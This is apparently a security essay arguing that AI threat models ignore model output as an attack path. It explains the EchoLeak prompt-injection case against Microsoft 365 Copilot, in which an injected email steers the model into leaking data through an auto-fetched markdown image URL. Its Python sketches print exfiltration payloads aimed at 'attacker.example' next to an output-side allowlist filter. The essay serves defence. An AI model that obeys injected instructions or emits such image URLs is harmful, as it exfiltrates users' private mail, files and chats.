Output As Payload: Your AI Threat Model Only Got Half The Boundary
The threat model your team wrote for AI features almost certainly stops at the model. Inputs are untrusted: prompt injection, jailbreaks, adversarial uploads, poisoned retrieval. Outputs are content: things to moderate for safety, score on a refusal eval, ship to the user. The shape of that threat model is roughly "untrusted thing goes in, model thinks, safe thing comes out."
The new attack class flips that polarity. The model's output is rendered, parsed, executed, or relayed by a downstream system, and an attacker who can shape that output — through indirect prompt injection in retrieval, training-data influence, or socially engineered user queries — can deliver a payload to a target the model never had direct access to. The model becomes a confused deputy with reach the attacker doesn't have, and the boundary your team is defending is two systems too early.
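The vulnerable shape is easy to write down. Below is a minimal sketch in Python; `call_model` and `render_html` are hypothetical stand-ins, not any vendor's real API, and the hardcoded reply just illustrates what an injected document could plausibly steer a model to emit. The point is structural: the guardrail lives on the input, while the output flows unchecked into a component that parses and acts on it.

```python
import re

def call_model(prompt: str) -> str:
    """Hypothetical stand-in for an LLM call. Returns what an injected
    document in the prompt could plausibly steer the model to emit."""
    return ("Here is your summary. "
            "![status](https://attacker.example/px?d=Q3+revenue+draft)")

def render_html(reply_markdown: str) -> str:
    """Naive downstream renderer: rewrites markdown images into <img>
    tags. The client auto-fetches every src at display time, so each
    external URL in the model's output becomes an outbound request the
    user never approved."""
    return re.sub(r"!\[([^\]]*)\]\(([^)\s]+)\)",
                  r'<img alt="\1" src="\2">', reply_markdown)

def answer(user_query: str, retrieved_docs: list[str]) -> str:
    # Input boundary (defended): the query may be screened by a
    # classifier, but the retrieved docs carry the injection, and the
    # model's output is never inspected at all.
    context = "\n".join(retrieved_docs)
    reply = call_model(f"{context}\n\nUser: {user_query}")
    # Output boundary (undefended): the reply crosses into the renderer
    # as if it were trusted; whoever shaped it now reaches the client's
    # network position.
    return render_html(reply)

print(answer("Summarize my inbox", ["<email body with hidden instructions>"]))
```

Every piece looks reasonable in isolation; the flaw is that the trust label flips silently between `call_model` and `render_html`.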
EchoLeak (CVE-2025-32711) is the canonical 2025 example. A single crafted email arrives in a Microsoft 365 mailbox. Copilot ingests it as part of routine context. The hidden instructions steer Copilot into embedding sensitive context in the URL of a reference-style markdown image, and the client interface auto-fetches that image when rendering the response, exfiltrating chat logs, OneDrive content, and Teams messages without a single user click. Microsoft's input-side classifier was bypassed because the attack never needed to break the model's refusal calibration; it only needed to shape one specific token sequence in the output.
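To make the mechanics concrete, here is a sketch of the payload shape described in the public write-ups, alongside one possible output-side check. The allowlist, regexes, and function names are illustrative assumptions, not Microsoft's actual remediation.

```python
import re
from urllib.parse import urlparse

# Payload shape (illustrative): a reference-style markdown image. The
# usage site and the URL definition live on separate lines, which
# reportedly let it slip past a redaction step that matched only the
# inline ![alt](url) form.
REPLY = """Here is the summary you asked for.

![status][ref]

[ref]: https://attacker.example/collect?d=<base64-of-sensitive-context>
"""

# Hypothetical allowlist; a real deployment would pin this to its own CDN.
ALLOWED_IMAGE_HOSTS = {"res.cdn.example.net"}

INLINE_IMG = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")
REF_DEF = re.compile(r"^\s*\[[^\]]+\]:\s*(\S+)", re.MULTILINE)

def strip_untrusted_images(reply: str) -> str:
    """Treat the model's reply as untrusted output: drop any image whose
    host is off the allowlist, covering both inline and reference-style
    markdown. Removing the [ref]: definition leaves the ![status][ref]
    usage dangling as plain text, so nothing gets fetched."""
    def check(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[external image removed]"
    return REF_DEF.sub(check, INLINE_IMG.sub(check, reply))

print(strip_untrusted_images(REPLY))
```

An allowlist like this only holds if no allowed host can be abused as a redirector or proxy for attacker URLs, a secondary trick the EchoLeak write-up also describes; the stricter stance is to never auto-fetch external images from model-generated content at all.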
